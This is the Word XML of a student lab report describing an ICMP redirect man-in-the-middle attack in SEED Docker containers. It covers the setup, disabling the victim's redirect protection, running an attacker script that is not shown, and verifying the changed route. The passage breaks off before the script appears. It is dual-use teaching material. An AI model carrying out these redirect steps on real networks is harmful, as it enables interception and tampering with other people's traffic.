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FC9C5" w14:textId="7FA45682" w:rsidR="00E44D6C" w:rsidRDefault="0098542A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ICMP Redirect attack (</w:t>
      </w:r>
      <w:r w:rsidR="00DC1FE2" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Man in the middle attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4286C171" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C11158" w14:textId="1AC32C2C" w:rsidR="004957A4" w:rsidRDefault="004957A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Name – Jagdeep Kainth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B01435" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF3ABED" w14:textId="4F74262D" w:rsidR="004957A4" w:rsidRDefault="00DC1FE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>March 15, 2024</w:t>
      </w:r>
      <w:r w:rsidR="004957A4" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F98F1" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C4350F" w14:textId="2745F5F9" w:rsidR="002C4ADE" w:rsidRDefault="002C4ADE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18994664" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCE3546" w14:textId="77777777" w:rsidR="002C4ADE" w:rsidRPr="00543DDA" w:rsidRDefault="00DC1FE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>This report explains about the packet redirection functionality provided by internet Control Message protocol(ICMP). The report discussing about what presence of ICMP Redirect messages in the network usually tells</w:t>
      </w:r>
      <w:r w:rsidR="000B351E" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">. Man in the Middle attack are one of the most common and dangerous cyber-attack, that can be a great harm to the security and privacy of the network. </w:t>
      </w:r>
      <w:r w:rsidR="002275B0" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>In this attack, a attacker(malicious actor) tries to intercept and change the communication between two hosts , for example a user and a web application page or a client and a server or even two different devices communicating on the same network.</w:t>
      </w:r>
      <w:r w:rsidR="00C61F9D" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker can steal important information of the victim, alter that information, inject malware, steal credential, redirect traffic.</w:t>
      </w:r>
      <w:r w:rsidR="002C4ADE" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C61F9D" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">There are some recommendations to prevent this attack from happening. Client can use secure communication protocols for this such as HTTPS and avoid using http Client should only consider using those web pages that has SSL(secure socket layer) certificate. Usage of SSH (secure shell), SFTP(Secure File Transfer Protocol) for file transfers are highly recommended. Using VPN, and applying strong encryption and authentication protocols, firewalls, antivirus software can protect against MITM attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E417B2" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRDefault="00C61F9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidR="009A61A9" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Rublon Authors, December 14, 2023</w:t>
      </w:r>
      <w:r w:rsidR="00C63ADA" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A61A9" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA4602" w14:textId="7D558BE0" w:rsidR="009A61A9" w:rsidRPr="00543DDA" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00977F65">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Attack Description </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B312FE8" w14:textId="64A0C9AC" w:rsidR="00977F65" w:rsidRPr="00977F65" w:rsidRDefault="00114FE0" w:rsidP="00977F65">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114FE0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>An error message that a router sends to the IP packet sender is known as an ICMP redirect. Redirects are used by routers to let senders know that their following packets sent to the same destination should use a different router if they think a packet is being routed wrongly. One may utilize ICMP redirection by attackers to alter the victim's path.</w:t>
      </w:r>
      <w:r w:rsidR="00977F65" w:rsidRPr="00977F65">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00977F65" w:rsidRPr="00977F65">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The aim of this operation is to initiate an ICMP redirect attack against the victim, so that the malicious router container (10.9.0.111) will be used as the victim's router when it receives packets addressed to 192.168.60.5. Since the attacker controls the malicious router, the attacker has the ability to intercept packets, alter them, and then resend the altered packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A197724" w14:textId="1843EDE4" w:rsidR="005B3A07" w:rsidRPr="005B3A07" w:rsidRDefault="005B3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3A07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab experiment, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>we will create a virtualized environment using docker container in seed ubuntu virtual machine. The attacker (10.9.0.105) used the malicious router to gain access to victim (10.9.0.5) computer. The attacker will intercept the packets that were being send through legitimate router 10.9.0.11 to the network 192.168.60.11. The picture given below is the exact topology used in this experiment.</w:t>
      </w:r>
      <w:r w:rsidR="00C63ADA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ Wenliang Du, 2020 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8F9B4" w14:textId="37C98797" w:rsidR="00543DDA" w:rsidRDefault="005B3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B3A07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4EF8C8" wp14:editId="7FE964B6">
            <wp:extent cx="5457190" cy="2855343"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="603119338" name="Picture 1" descr="A computer network diagram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19338" name="Picture 1" descr="A computer network diagram with numbers and symbols&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5511619" cy="2883822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7783B" w14:textId="3082B225" w:rsidR="009A61A9" w:rsidRDefault="00463232">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab experiment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067AB877" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="00463232" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CAE2E37" w14:textId="11115970" w:rsidR="00463232" w:rsidRDefault="00463232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008927F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting up the environment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C4798" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="008927F7" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744DE9DB" w14:textId="42E8BA82" w:rsidR="00463232" w:rsidRPr="00690879" w:rsidRDefault="000D48A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1- </w:t>
      </w:r>
      <w:r w:rsidR="00463232" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After unzip the lab folder and opening terminal, We will first go in the lab directory using cd command to run docker file using commands, such as docker-compose build and docker -compose up. To ensure that the victim computer will accept the ICMP redirect message</w:t>
      </w:r>
      <w:r w:rsidR="00BC0809" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will turn off the by default protection by simply using the command changing the value of net.ipv4.conf.all.accept_redirect=1, which was 0 before. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911AECB" w14:textId="5330A24E" w:rsidR="009A61A9" w:rsidRDefault="008927F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008927F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BCF7CAE" wp14:editId="0F9ECF91">
            <wp:extent cx="4546121" cy="2176104"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1557283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83651" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4573559" cy="2189238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72698FF6" w14:textId="52BBF883" w:rsidR="009A61A9" w:rsidRPr="00690879" w:rsidRDefault="008927F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now on the victim, we will check IP route</w:t>
      </w:r>
      <w:r w:rsidR="000E6225" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we can see its going via 10.9.0.11 which is a legitimate server. Our goal in this experiment is to redirect the ICMP packet via malicious router which is 10.9.0.111. we will run a python script called  redirect.py</w:t>
      </w:r>
      <w:r w:rsidR="0017534C" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000E6225" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="0017534C" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">given </w:t>
      </w:r>
      <w:r w:rsidR="000E6225" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>at the end of document</w:t>
      </w:r>
      <w:r w:rsidR="0017534C" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000E6225" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the attacker computer. </w:t>
      </w:r>
      <w:r w:rsidR="000F5A11" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidR="009A7635" w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>running the script we will verify that if the attack worked or not by using the command mtr -n 192.168.60.5 on the victim computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DB952" w14:textId="4C536CB8" w:rsidR="009A7635" w:rsidRDefault="0017534C" w:rsidP="009A7635">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E0CB25" wp14:editId="3A7E43B8">
            <wp:extent cx="4407243" cy="2447561"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1859438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38604"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0561" cy="2460510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7164954E" w14:textId="5EF80665" w:rsidR="00690879" w:rsidRDefault="00690879" w:rsidP="009A7635">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Before the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389AC8C" w14:textId="1D6AE327" w:rsidR="00690879" w:rsidRDefault="00690879" w:rsidP="00690879">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70E60639" wp14:editId="31558FE6">
            <wp:extent cx="4860324" cy="761950"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="12494269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26920"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2351" cy="766971"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E9009" w14:textId="77777777" w:rsidR="00690879" w:rsidRDefault="00690879" w:rsidP="009A7635">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5951FCBB" w14:textId="5A00F284" w:rsidR="00690879" w:rsidRPr="00690879" w:rsidRDefault="00690879" w:rsidP="009A7635">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690879">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC1738" w14:textId="47EDF366" w:rsidR="009A61A9" w:rsidRDefault="00690879" w:rsidP="00690879">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72465A7E" wp14:editId="35524CB5">
            <wp:extent cx="5033319" cy="815279"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="147744781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47812" name="Picture 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1439" cy="818214"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A5E44" w14:textId="5C40AF65" w:rsidR="00690879" w:rsidRDefault="00690879" w:rsidP="00690879">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D48A8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>From the</w:t>
      </w:r>
      <w:r w:rsidR="000D48A8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> table observations above we can see that now the ICMP redirect packet is going via the malicious router, hence we successfully completed the part 1 of the MITM attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC6CE06" w14:textId="7AFBDDA2" w:rsidR="000D48A8" w:rsidRDefault="000D48A8" w:rsidP="00690879">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
